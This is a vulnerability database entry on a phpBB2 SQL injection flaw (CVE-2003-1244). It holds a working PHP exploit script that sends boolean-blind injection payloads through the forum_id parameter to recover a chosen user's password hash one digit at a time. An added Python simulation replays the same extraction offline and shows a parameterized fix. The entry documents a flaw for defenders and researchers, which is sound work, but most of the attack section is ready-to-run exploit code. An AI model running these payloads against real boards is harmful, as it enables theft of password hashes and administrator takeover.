phpBB2 Remote SQL Injection Vulnerability

Vulnerability ID: 1107205    Type: SQL injection
Published: 2003-02-19    Updated: 2006-01-17
CVE: CVE-2003-1244    CNNVD ID: CNNVD-200312-246
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/22267
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-246
|Vulnerability details
phpBB is a popular open-source bulletin-board system. Some phpBB2 scripts do not sufficiently validate user-supplied input before using it to build SQL queries. A remote attacker can submit crafted SQL fragments that change the logic of the queries phpBB2 issues, which allows unauthorized reads and writes against the database, disclosure of sensitive information (such as password hashes), and potentially access to the application as a phpBB2 administrator.
|Exploit
source: http://www.securityfocus.com/bid/6888/info

A SQL injection vulnerability has been reported in phpBB2.

phpBB2, in some cases, does not sufficiently sanitize user-supplied input which is used when constructing SQL queries. As a result, attackers may supply malicious parameters to manipulate the structure and logic of SQL queries. This may result in unauthorized operations being performed on the underlying database, and may be exploited to disclose sensitive information to a remote attacker. The exploit below drives a boolean-blind injection through the forum_id POST parameter: whether the injected condition holds decides whether the page reports 0 users online, and that single bit is used to recover a target user's password hash one hex digit at a time.

<?php

########## PHPBB 2.0,2.01,2.02 Auto-SelectFish Attacker
########## David@cgishield.com


// To use this program, simply upload it to a php enabled webserver, and execute
// If php times out before the whole password hash is determined,
// adjust the maximum script execution time in php.ini
// Also, replace following with correct values:

$server="192.168.1.100";
$script="/phpbb2/index.php";
$the_userid_to_hack="2";


// don't change this: the "nobody online" line of the English phpBB2 template.
// It is the boolean oracle: when it appears, the injected condition was false.
$data_to_match="In total there are <b>0</b> users online";

// MySQL CHAR() codes for the 16 hex digits of a 32-character MD5 hash.
// Keys are quoted: bare a..f were undefined constants, an error in PHP 8.
$checkchar = array(
    '0'=>"char(48)", '1'=>"char(49)", '2'=>"char(50)",  '3'=>"char(51)",
    '4'=>"char(52)", '5'=>"char(53)", '6'=>"char(54)",  '7'=>"char(55)",
    '8'=>"char(56)", '9'=>"char(57)", 'a'=>"char(97)",  'b'=>"char(98)",
    'c'=>"char(99)", 'd'=>"char(100)", 'e'=>"char(101)", 'f'=>"char(102)",
);

// Recover the hash one position at a time: for each position try every hex
// digit until the page stops reporting 0 users online, then print that digit.
// The trailing /* comments out whatever phpBB appends after forum_id.
for($i=1;$i<33;$i++){
    foreach ($checkchar as $i2 => $i2val){
        $vars="forum_id=1+or+user_id=$the_userid_to_hack+and+mid(user_password,$i,1)=$i2val/*";
        $data=sendToHost($server,'post',$script,$vars);
        if (stripos($data,$data_to_match) !== false){
            // condition was false for this digit, try the next one
        }
        else{echo("<br>$i= $i2"); flush();break;}
    }
}


// Minimal HTTP client over a raw socket; returns the full response (headers + body).
function sendToHost($host,$method,$path,$data,$useragent=1)
{
    $method = strtoupper($method);
    $buf = '';
    $fp = fsockopen($host,80,$errno,$errstr,30);
    if (!$fp) { die("connect to $host failed: $errstr ($errno)"); }
    fputs($fp, "$method $path HTTP/1.1\r\n");
    fputs($fp, "Host: $host\r\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Content-length: " . strlen($data) . "\r\n");
    if ($useragent)
        fputs($fp, "User-Agent: Mozilla\r\n");
    fputs($fp, "Connection: close\r\n\r\n");
    if ($method == 'POST')
        fputs($fp, $data);
    while (!feof($fp))
        $buf .= fgets($fp,128);
    fclose($fp);
    usleep(1000); // small pause between requests (was an empty busy-wait loop)

    return $buf;
}

?>
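The extraction technique above, modelled offline so it can be stepped through without a phpBB2 install. This is an added example, not phpBB's code or the original exploit: the tables, the sample rows (a guest session on forum 3 and an admin whose hash is MD5("password")), and the "who is online" query shape are constructed stand-ins, with MySQL's MID() registered on SQLite. The vulnerable query splices forum_id into the SQL text exactly as the advisory describes; the hardened query casts to int and binds the value. extract_hash() replays the PHP loop: 16 probes per position at most, the trailing /* commenting out the ORDER BY that follows the injection point.

```python
import sqlite3

HEX_DIGITS = "0123456789abcdef"


def make_db():
    """Constructed stand-in for the tables the exploit touches (not phpBB's schema)."""
    conn = sqlite3.connect(":memory:")
    # MySQL's MID(str, pos, len) is 1-indexed; SQLite has no MID, so register one.
    conn.create_function("mid", 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
    conn.executescript("""
        CREATE TABLE users (user_id INTEGER, username TEXT, user_password TEXT);
        CREATE TABLE sessions (session_user_id INTEGER, session_forum_id INTEGER);
        INSERT INTO users VALUES (1, 'guest', '00000000000000000000000000000000');
        INSERT INTO users VALUES (2, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO sessions VALUES (1, 3);   -- guest is browsing forum 3, nobody is on forum 1
    """)
    return conn


def online_users_vulnerable(conn, forum_id):
    """forum_id is spliced into the SQL text: the defect class the advisory describes."""
    sql = ("SELECT u.username FROM users u, sessions s "
           "WHERE u.user_id = s.session_user_id AND s.session_forum_id = " + str(forum_id) +
           " ORDER BY u.username")
    return [row[0] for row in conn.execute(sql)]


def online_users_fixed(conn, forum_id):
    """Hardened form: reject non-integers up front and bind the value as a parameter."""
    sql = ("SELECT u.username FROM users u, sessions s "
           "WHERE u.user_id = s.session_user_id AND s.session_forum_id = ? ORDER BY u.username")
    return [row[0] for row in conn.execute(sql, (int(forum_id),))]


def fixed_rejects(conn, forum_id):
    """True when the hardened query refuses the value (int() raises ValueError)."""
    try:
        online_users_fixed(conn, forum_id)
    except ValueError:
        return True
    return False


def render_page(conn, forum_id, query=online_users_vulnerable):
    """The one line of the page the exploit inspects."""
    return f"In total there are <b>{len(query(conn, forum_id))}</b> users online"


def extract_hash(conn, user_id, length=32):
    """Boolean-blind recovery of users.user_password for user_id, one hex digit per position.

    Returns (recovered_hash, number_of_requests). With AND binding tighter than OR,
    'forum_id = 1 or user_id=N and mid(...)=char(C)' makes user N count as online
    exactly when the mid() comparison holds, which flips the '0 users online' text.
    """
    recovered, requests = "", 0
    for pos in range(1, length + 1):
        for digit in HEX_DIGITS:
            payload = f"1 or user_id={user_id} and mid(user_password,{pos},1)=char({ord(digit)})/*"
            requests += 1
            if "there are <b>0</b> users online" not in render_page(conn, payload):
                recovered += digit
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return recovered, requests


if __name__ == "__main__":
    db = make_db()
    hash_value, n = extract_hash(db, 2)
    print(f"recovered {hash_value} in {n} requests")
    probe = "1 or user_id=2 and mid(user_password,1,1)=char(53)/*"
    print("hardened query rejects the payload:", fixed_rejects(db, probe))
```

Two things worth noticing when running it. The oracle only works because forum 1 has nobody online and at least one session row exists for the OR branch to pair with, which is why the original script tells you not to change the match string and why it can fail on a busy board. And the cost is linear in the alphabet: the sample hash takes 304 requests for 32 digits; comparing against a threshold instead of a fixed digit would bring that down to 4 per position, but the page's own script does not do that. SQLite's char() needs version 3.7.16 or later, which every current Python ships.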
|References

Source: BID
Name: 6888
Link: http://www.securityfocus.com/bid/6888
Source: XF
Name: phpbb-pageheader-sql-injection(11376)
Link: http://www.iss.net/security_center/static/11376.php
Source: BUGTRAQ
Name: 20030220 phpBB Security Bugs
Link: http://archives.neohapsis.com/archives/bugtraq/2003-02/0245.html
Source: NSFOCUS
Name: 4439
Link: http://www.nsfocus.net/vulndb/4439